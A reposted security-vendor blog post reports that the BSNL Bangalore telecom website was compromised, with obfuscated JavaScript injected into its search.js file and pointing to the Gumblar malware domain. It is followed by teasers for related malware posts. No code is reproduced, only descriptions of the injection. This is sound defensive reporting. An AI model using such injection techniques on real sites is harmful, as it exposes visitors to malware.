BSNL, Bangalore telecom district has become yet another victim of poor website security and has been infected with malicious JavaScript code. This time, the code points to a malicious domain used by the popular Gumblar botnet. Recently, my colleague Pradeep blogged about two Indian websites, ICWAI and KVGBANK that were also infected with malicious content. The “http://www.bangaloretelecom.com” site provides information on telecommunications services offered, telephone number search, online payment of bills, etc. This is yet another example of a
popular website in India which has been compromised. Here is the screenshot of home page:
Interestingly, the home page does not contain malicious content, but rather the malicious JavaScript has been injected into one of the “.js” files used for searching the content of the website. If you look at the above screenshot, you will see small search box. The attack will be activated if you search on anything using this functionality. Below is a screenshot of the search page a user is redirected to:
The source code of this page contains various “.js” files. The “search.js” file is infected with malicious JavaScript code. Here is the source code of that file:
The malicious JavaScript code is inserted at the bottom of this “.js” file. Here is the malicious content:
There are six different malicious JavaScript snippets, each obfuscated in a different way, but all ultimately point to same malicious domain. Let’s investigate one of them:
The decoded script is shown below:
The above malicious code points to the malicious domain “gumblar.cn”, which was used by the Gumblar Trojan. Fortunately, the malicious domain has now been taken down.
Zscaler blocks the infected page (http://bangaloretelecom.com/search.js) rather than blocking whole website. This example illustrates how malicious content can be filtered out, while still allowing access to what is an otherwise legitimate site – an important approach, given the prevalence of malicious infections. Our recent posts highlight the fact that numerous popular Indian web sites are struggling with proper application security controls.
Umesh
Related Posts
- Somerset County Council website victim of Blackhat SEO and malware injection
Sophos users over the past few months may have noticed that they haven’t been able to access parts of the Somerset Information Exchange (SiX) due to instances of Mal/Badsrc-C on the site.
The pr... - Randomization of code and binaries used by a fake antivirus website
Last week, I talked about heavy obfuscation being used by attackers to hide their HTML source code from detection. This time we came across an interesting fake antivirus website, which not only contin... - Yet another “Skype Themed” malicious spam.
We are currently processing several thousand messages in yet another email spam campaign, this time related to Skype and all its goodness.
Unlike the other malicious campaigns we have seen... - Investigating Malicious Website Reports, (Sat, Sep 4th)
This morning we received a report from Holger about a website that was triggering alerts in Google and his anti-virus applications. I wanted to share my response process.
My first step is... - Another round of Asprox SQL injection attacks
The Asprox bot is behind some of the latest SQL injection attacks.
View full post on M86 Security Labs Blog... - Beware: Attackers Could Use New iPhone 4 Jailbreak Code to Carry Out Malicious Attacks
It seems like almost everyone I know has an iPhone, or at least wants one. Among iPhone users in the U.S.—where the phone’s operating system is locked and customers are limited to just one... - Dell replacement server motherboards found with malicious code
Boards on new PowerEdge equipment and non-Windows systems not affected.According to a note on Dell’s company support forum, a small number of PowerEdge R410 replacement motherboards have been fo... - WSJ a Victim, Not the Source, of SQL Injection
As mentioned earlier this week, about 7k pages (not sites) have been struck by SQL injected iframes pointing to malware on robint.us. (That number has been over-inflated by over 100k or even a million... - Malware: Fighting Malicious Code
I contributed a few chapters to this Ed Skoudis' book, which focuses on defending against the threat of malicious code.
View full post on Lenny Zeltser's Website... - Request contained a malicious JavaScript or SQL injection attack
bad-behavior is now blocking what it says is a SQL injection but all its really looking for is a # in the header. So I end up seeing crap like this.I think this may be a bug in bad behaviorUpdate: I a...
Posted on 02 March 2011. Tags: another, Bangalore, BSNL, Code, Injection, Malicious, Victim, Website
The above information is reprinted from and copyrighted © by Zscaler.
